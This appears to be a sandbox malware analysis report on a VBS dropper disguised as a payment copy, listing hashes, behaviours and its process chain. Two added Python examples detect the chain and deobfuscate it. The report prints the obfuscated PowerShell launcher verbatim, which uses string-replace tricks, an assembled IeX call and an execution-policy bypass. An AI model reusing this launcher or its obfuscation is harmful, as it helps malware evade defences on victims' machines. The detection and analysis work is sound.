Analysis

max time kernel: 119s
max time network: 123s
platform: windows7_x64
resource: win7-en-20211014
submitted: 18-11-2021 19:18

Static task: static1
Behavioral task: behavioral1
Sample: J3m1a_Payment_Copy.vbs
Resource: win7-en-20211014
General

Target: J3m1a_Payment_Copy.vbs
Size: 2KB
MD5: 69cb30fd3d94cfcc7c89a1f41a47d8dd
SHA1: 5cc7c867d8b5238fa7ad4718c5ba5d105e72cd22
SHA256: 6cb5a93eec2726f651d8a61a9e865d46a93324992d9a2467edb6b83b64789985
SHA512: 02a96d4ecfda83233a557ac3cf94629ee251ed9ecef775bd697d371091c5c03fb48aacb4640770fdd9fd097f1cd118b62053c0f26183e08062ede68a6c4b8d5a
Malware Config
Signatures
- Enumerates physical storage devices (1 TTP)
  Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
  This is a generic drive-enumeration heuristic; nothing else in this report (no file writes outside the dropped script, no encryption activity) supports the ransomware label on its own.

- Suspicious behavior: EnumeratesProcesses (2 IoCs)
  pid   process
  620   powershell.exe
  524   powershell.exe

- Suspicious use of AdjustPrivilegeToken (2 IoCs)
  description               pid   process
  Token: SeDebugPrivilege   620   powershell.exe
  Token: SeDebugPrivilege   524   powershell.exe

- Suspicious use of WriteProcessMemory (6 IoCs)
  description                       pid   process          target pid   target process
  PID 892 wrote to memory of 620    892   WScript.exe      620          powershell.exe   (3 occurrences)
  PID 620 wrote to memory of 524    620   powershell.exe   524          powershell.exe   (3 occurrences)
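The WriteProcessMemory IoCs above give the whole launch chain: WScript.exe (PID 892) spawns powershell.exe (PID 620), which spawns a second powershell.exe (PID 524). The Python below is an added example and not part of the sandbox report: it replays constructed process-creation events built from this report's Processes section and flags the chain with three hand-written rules. The event model, the rule names and the script-host list (wscript.exe, cscript.exe) are assumptions for illustration; PID 620's command line is abbreviated to the parts the rules inspect.

```python
import re
from dataclasses import dataclass


@dataclass(frozen=True)
class ProcEvent:
    pid: int
    ppid: int
    image: str
    cmdline: str


# Constructed from this report's Processes section (PIDs 892 -> 620 -> 524).
# PID 620's command line is abbreviated to the parts the rules look at.
EVENTS = [
    ProcEvent(892, 0, r"C:\Windows\System32\WScript.exe",
              r'"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\J3m1a_Payment_Copy.vbs"'),
    ProcEvent(620, 892, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              r'''"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $cc = 'by------------s'.Replace('------------','pas'); ... ;($Run -Join '')|&('I'+'eX')'''),
    ProcEvent(524, 620, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              r'"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -executionpolicy bypass -file C:\Users\Public\Downloads\HBar.ps1'),
]

SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}  # assumption: script hosts worth pairing with powershell.exe
# powershell.exe accepts unambiguous prefixes of -ExecutionPolicy (-ex, -exec, ...) and the special-case -ep.
BYPASS_RE = re.compile(r"-(?:ex\w*|ep)\s+bypass", re.I)
# -file pointing into the world-writable C:\Users\Public tree.
PUBLIC_FILE_RE = re.compile(r"-f(?:ile)?\s+\"?[a-z]:\\users\\public\\", re.I)
# &('I'+'eX'): a command name assembled from concatenated string literals.
CONCAT_INVOKE_RE = re.compile(r"&\s*\(\s*'[^']*'(?:\s*\+\s*'[^']*')+\s*\)")


def basename(path):
    return path.rsplit("\\", 1)[-1].lower()


def chain(events, pid):
    """Image names from the root ancestor down to pid."""
    procs = {e.pid: e for e in events}
    names = []
    while pid in procs:
        names.append(basename(procs[pid].image))
        pid = procs[pid].ppid
    return names[::-1]


def evaluate(events):
    """Return (pid, rule) pairs for every event that matches one of the rules."""
    procs = {e.pid: e for e in events}
    hits = []
    for e in events:
        parent = procs.get(e.ppid)
        child = basename(e.image)
        par = basename(parent.image) if parent else ""
        if par in SCRIPT_HOSTS and child == "powershell.exe":
            hits.append((e.pid, "script_host_spawned_powershell"))
        if child == "powershell.exe" and CONCAT_INVOKE_RE.search(e.cmdline):
            hits.append((e.pid, "concatenated_invoke_expression_call"))
        if (par == "powershell.exe" and child == "powershell.exe"
                and BYPASS_RE.search(e.cmdline) and PUBLIC_FILE_RE.search(e.cmdline)):
            hits.append((e.pid, "powershell_relaunch_bypass_public_script"))
    return hits


if __name__ == "__main__":
    print(" > ".join(chain(EVENTS, 524)))
    for pid, rule in evaluate(EVENTS):
        print(f"{pid}: {rule}")
```

Each rule keys on a parent/child pair plus one command-line feature, so a lone powershell.exe with -executionpolicy bypass started by an administrator does not trip the third rule; it needs the powershell-from-powershell relaunch and a script under C:\Users\Public, which is exactly what this sample does.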
Processes

1. C:\Windows\System32\WScript.exe (PID 892)
   "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\J3m1a_Payment_Copy.vbs"
   - Suspicious use of WriteProcessMemory

   2. C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (PID 620)
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $cc = 'by------------s'.Replace('------------','pas');$bb = '-ex++++++++++++++++icy'.Replace('++++++++++++++++','ecutionpol');$aa = '-no--------------le'.Replace('--------------','profi');$dd = 'C:\Us<<<<<<<<<>>>>>>>>>ar.ps1'.Replace('<<<<<<<<<>>>>>>>>>','ers\Public\Downloads\HB');$Run = 'Powers-----------------dd'.Replace('-----------------','hell $aa $bb $cc -file $');($Run -Join '')|&('I'+'eX')
      The .Replace() calls rebuild the string "Powershell $aa $bb $cc -file $dd", which is piped to IeX (the Invoke-Expression alias, itself assembled from 'I'+'eX'); Invoke-Expression expands the variables and launches the child below.
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken
      - Suspicious use of WriteProcessMemory

      3. C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (PID 524)
         "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -executionpolicy bypass -file C:\Users\Public\Downloads\HBar.ps1
         - Suspicious behavior: EnumeratesProcesses
         - Suspicious use of AdjustPrivilegeToken
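The stage-1 command line (PID 620) hides its arguments behind string .Replace() calls and reaches Invoke-Expression through an alias built from ('I'+'eX'). The Python below is an added example and not from the report: it statically evaluates the .Replace() assignments, expands the $variables the way Invoke-Expression would in the caller's scope, and checks that the result is the command line of PID 524. The regexes assume the exact shapes seen here (a single-quoted literal with one .Replace(), an &('..'+'..') sink); anything else is left untouched.

```python
import re

# Stage-1 command line of PID 620, copied verbatim from the Processes section.
STAGE1 = r"""$cc = 'by------------s'.Replace('------------','pas');$bb = '-ex++++++++++++++++icy'.Replace('++++++++++++++++','ecutionpol');$aa = '-no--------------le'.Replace('--------------','profi');$dd = 'C:\Us<<<<<<<<<>>>>>>>>>ar.ps1'.Replace('<<<<<<<<<>>>>>>>>>','ers\Public\Downloads\HB');$Run = 'Powers-----------------dd'.Replace('-----------------','hell $aa $bb $cc -file $');($Run -Join '')|&('I'+'eX')"""

# $name = '<base>'.Replace('<needle>','<repl>')   (PowerShell method names are case-insensitive)
ASSIGN_RE = re.compile(r"\$(\w+)\s*=\s*'([^']*)'\.Replace\('([^']*)'\s*,\s*'([^']*)'\)", re.I)
# ... | &('I'+'eX') : a command name assembled from concatenated string literals
SINK_RE = re.compile(r"\|\s*&\s*\(\s*('[^']*'(?:\s*\+\s*'[^']*')*)\s*\)")
VAR_RE = re.compile(r"\$(\w+)")


def resolve_assignments(script):
    """Evaluate each .Replace() assignment statically; keys are lower-cased variable names."""
    env = {}
    for name, base, needle, repl in ASSIGN_RE.findall(script):
        env[name.lower()] = base.replace(needle, repl)
    return env


def expand_variables(text, env):
    """Substitute $name references as Invoke-Expression would when it runs the
    string in the caller's scope; unknown names are left as they are."""
    return VAR_RE.sub(lambda m: env.get(m.group(1).lower(), m.group(0)), text)


def resolve_sink(script):
    """Return the command name built by &('..'+'..'), or None if that pattern is absent."""
    m = SINK_RE.search(script)
    if not m:
        return None
    return "".join(re.findall(r"'([^']*)'", m.group(1)))


def deobfuscate(script):
    env = resolve_assignments(script)
    sink = resolve_sink(script)
    # The value piped into the sink is the last statement before '|', here ($Run -Join '');
    # -Join '' on a single string is a no-op, so the payload is just $Run.
    last_stmt = script.rsplit("|", 1)[0].split(";")[-1]
    piped = VAR_RE.findall(last_stmt)
    payload = env.get(piped[0].lower(), "") if piped else ""
    return {
        "variables": env,
        "sink": sink,
        "sink_is_invoke_expression": (sink or "").lower() in ("iex", "invoke-expression"),
        "command": expand_variables(payload, env),
    }


def indicators(result):
    """Cheap triage flags on the recovered command line."""
    cmd = result["command"].lower()
    return {
        "no_profile": "-noprofile" in cmd,
        "execution_policy_bypass": "-executionpolicy bypass" in cmd,
        "script_in_public_dir": "\\users\\public\\" in cmd,
        "invoke_expression_sink": result["sink_is_invoke_expression"],
    }


if __name__ == "__main__":
    result = deobfuscate(STAGE1)
    for name, value in result["variables"].items():
        print(f"${name} = {value}")
    print("sink    :", result["sink"])
    print("command :", result["command"])
    print("flags   :", indicators(result))
```

Resolving the launcher statically, rather than running it, is what makes the sandbox's child process line reproducible from the parent's command line alone; the same resolver can be pointed at other samples of this loader as long as they keep the single .Replace() per variable shape.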
Network
MITRE ATT&CK Matrix ATT&CK v6
Downloads

- C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
  MD5: 8a3b2f5dd6c4dbe15c05c95d1901737d
  SHA1: 360a38027ce3a0551dd6f699531dbeb9df522644
  SHA256: fba1e10505e01591f971d9b5f789643e1dd033ed7d5e8275cd0d7baf4d33d73b
  SHA512: c433ac6f240fc5188af02314475f901b73c683c6d08136393a3a1234cd8427d32830703e6e596b4ca2f55239406e114f746a0245649e2fe16bdbeb58066f7992

- C:\Users\Public\Downloads\HBar.ps1
  (second-stage script executed by PID 524; the report does not show its contents)
  MD5: 337541d9757cb9a63d85337a2f1a4f27
  SHA1: 377ed9d80c26e3d0f3d6f943fa773a3ff83fe242
  SHA256: 867cca9a95ed015d4a227078782bf495af80c6101d0085eddcfe8aecc6284bef
  SHA512: 9e98ac416efd807434386942b6f3fb938a384479a0703e89324b769053eaf72ecd609cc826f172227ad93e7efd5e90caeb0ebca939bbec53981244013bb31031

- memory/524-66-0x000007FEF24B0000-0x000007FEF300D000-memory.dmp
  Filesize: 11.4MB

- memory/524-68-0x0000000002460000-0x0000000002462000-memory.dmp
  Filesize: 8KB

- memory/524-72-0x000000000246B000-0x000000000248A000-memory.dmp
  Filesize: 124KB

- memory/524-70-0x0000000002464000-0x0000000002467000-memory.dmp
  Filesize: 12KB

- memory/524-69-0x0000000002462000-0x0000000002464000-memory.dmp
  Filesize: 8KB

- memory/524-63-0x0000000000000000-mapping.dmp

- memory/620-67-0x000000000283B000-0x000000000285A000-memory.dmp
  Filesize: 124KB

- memory/620-60-0x0000000002832000-0x0000000002834000-memory.dmp
  Filesize: 8KB

- memory/620-59-0x0000000002830000-0x0000000002832000-memory.dmp
  Filesize: 8KB

- memory/620-62-0x000000001B7C0000-0x000000001BABF000-memory.dmp
  Filesize: 3.0MB

- memory/620-58-0x000007FEF24B0000-0x000007FEF300D000-memory.dmp
  Filesize: 11.4MB

- memory/620-56-0x0000000000000000-mapping.dmp

- memory/620-61-0x0000000002834000-0x0000000002837000-memory.dmp
  Filesize: 12KB

- memory/892-55-0x000007FEFBA81000-0x000007FEFBA83000-memory.dmp
  Filesize: 8KB